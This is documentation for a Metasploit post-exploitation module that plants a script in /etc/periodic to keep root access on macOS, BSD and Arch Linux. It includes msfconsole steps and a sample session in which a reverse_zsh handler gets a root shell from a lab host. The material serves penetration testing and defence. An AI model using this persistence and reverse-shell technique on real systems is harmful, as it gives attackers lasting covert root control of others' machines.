Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/multi/local/periodic_script_persistence.md
21665 views

Description

This module provides a persistence mechanism on OSX, BSD and Arch Linux using periodic scripts. The modules will write a script to /etc/periodic /daily/, /etc/periodic/weekly/ or /etc/periodic/monthly/. This script will then execute a payload which is written by default to /tmp/.

Verification Steps

  1. Obtain a session with super user privilleges, only the root user has write permissions to /etc/periodic/

  2. Do: use exploit/multi/local/periodic_script_persistence

  3. Do: set session #

  4. Do: set target #

  5. Do: set payload #

  6. Do: set verbose true

  7. Do: expoit

Options

PERIODIC_DIR

Periodic Directory to write script eg. /etc/periodic/daily

PERIODIC_SCRIPT_NAME

Name of periodic script

Scenarios

msf6 exploit(multi/local/periodic_script_persistence) > set session 1
session => 1
msf6 exploit(multi/local/periodic_script_persistence) > run verbose=true 

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. /etc/periodic/daily/ is writable
[*] Writing '/etc/periodic/daily/jX3dG9' (118 bytes) ...
[*] Succesfully wrote periodic script to /etc/periodic/daily/jX3dG9.
[*] Cleanup command 'sudo rm/etc/periodic/daily/jX3dG9'
msf6 exploit(multi/local/periodic_script_persistence) > handler -p cmd/unix/reverse_zsh -P 4444 -H ens39
[*] Payload handler running as background job 4.

msf6 exploit(multi/local/periodic_script_persistence) > [*] Started reverse TCP handler on 192.168.168.219:4444 
[*] Command shell session 6 opened (192.168.168.219:4444 -> 192.168.168.175:49190) at 2025-08-29 17:49:54 +0200
msf6 exploit(multi/local/periodic_script_persistence) > sessions

Active sessions
===============

  Id  Name  Type                 Information           Connection
  --  ----  ----                 -----------           ----------
  1         meterpreter x64/osx  root @ mss-Mac.local  192.168.168.219:4242 -> 192.168.168.175:49165 (192.168.168.175)
  6         shell cmd/unix                             192.168.168.219:4444 -> 192.168.168.175:49190 (192.168.168.175)

msf6 exploit(multi/local/periodic_script_persistence) > sessions 6
[*] Starting interaction with 6...

id
uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),12(everyone),20(staff),29(certusers),61(localaccounts),80(admin),701(com.apple.sharepoint.group.1),33(_appstore),98(_lpadmin),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae)